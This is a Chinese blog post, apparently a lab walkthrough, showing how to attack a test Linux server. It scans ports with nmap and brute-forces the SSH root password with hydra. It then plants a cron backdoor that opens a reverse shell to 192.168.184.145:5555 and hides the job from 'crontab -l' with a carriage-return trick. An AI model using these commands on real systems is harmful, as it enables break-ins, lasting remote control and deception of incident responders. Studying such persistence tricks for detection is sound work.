本次实验主要是为了应急响应打基础,从攻击者的角度出发,知己知彼,百战不殆
一、环境搭建
目标服务器无WEB网站,
访问目标发现只有默认的一个apache的默认页面
IP地址:192.168.184.142
靶场环境、使用的工具,放在了 知识星球 中。
二、模拟攻击
2.1 扫描端口
使用nmap扫描
因为没有WEB网站,使用 nmap 扫描是否有开放的端口
nmap -sS 192.168.184.142
通过扫描结果发现,目标服务器开放了22与3306端口,其中22号端口是远程登录链接的可以进行暴力破解,3306端口是mysql数据库的端口,也是可以暴力破解的,本案例只演示 22 端口暴力破解
2.2 暴力破解拿到root密码
使用 hydra 爆破 ssh 登录密码
因为Linux服务器的账户默认都是root,一般不会更改,那么使用 hydra 爆破 ssh root账户登录密码
hydra.exe -l root -P C:\Users\Downloads\top1000.txt ssh://192.168.184.142
#-l 用户名
#-L 用户名字典的根路径
#-p 密码
#-P 密码字典的根路径
使用弱口令 排名前1000位的字典 top1000,进行爆破,稍等几分钟后,就爆破出来了密码为:1qaz2wsx3edc
使用 xshell 远程连接测试,发现成功登录
2.3 留crontab隐藏后men
好不容易拿下一个服务器,得留个后men以后经常使用,但是又不想让管理员轻而易举的发现该后men的位置,那就留一个crontab隐藏后men吧
crontab介绍:
crontab:定时任务,是用来定期执行程序的命令,crond 命令每分钟会定期检查是否有要执行的工作,如果有要执行的工作便会自动执行该工作。
那么把后men放在定时任务中,就会定期执行后men,比如一分钟执行一次、一小时执行一次
crontab查看定时任务命令:
crontab -l
**意思:**每分钟执行一次 写abc.txt文件,文件内容是$(date) aaa
接下来需要留crontab隐藏后men了
第一步:
植入crontab隐藏后men需要的文件
1.sh文件内容
#!/bin/bash
bash -i >& /dev/tcp/192.168.184.145/5555 0>&1
**意思是:**反弹shell到IP地址:192.168.184.145
2.sh文件内容
(crontab -l;printf "* * * * * /root/1.sh;\rno crontab for `whoami`%100c\n")|crontab -
**意思是:**建立crontab隐藏后men
注意: /root/1.sh 的位置是你把1.sh文件下载道德位置,本案例是计划下载到 /root 目录下,根据自己的实际情况进行修改即可
第二步:
我们把1.sh、2.sh 文件放在本地搭建的web服务上,下载到受害主机
下载完1.sh与2.sh文件后,给bash文件添加执行权限
chmod 777 1.sh
chmod 777 2.sh
第三步:
kali打开监听端口,等待shll连接
第四步:
查看现在是否含有定时任务,发现目标系统并没有定时任务
crontab -l
第五步:
最后执行2.sh文件,如果2.sh的命令成功执行则会返回如下图所示的提示“no crontab for root”,虽然是提示 root账户没有定时任务,但其实定时任务已经成功创建,
./2.sh
过一分钟之后,kali监听的5555端口,会收到shell连接消息,crontab隐藏后men创建成功(其中ls-l 查看的就是受害者服务的内容)
注意: 在shell中有些命令不能执行,
第六步:
接下来查看一下隐藏后men是不是真的隐藏了
crontab -l
发现真的是没有定时任务
虽然使用crontab -l没有发现定时任务,但是定时任务已经成功植入,只有通过在 /var/spool/cron 目录下 vi root 才可以看到真实的定时任务,连cat都看不到,隐藏的很好,会给应急响应人员带来一定程度的误导
更多web安全工具、存在漏洞的网站搭建源码、渗透测试思路,收集整理在知识星球。也可搜索关注微信公众号:W小哥
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
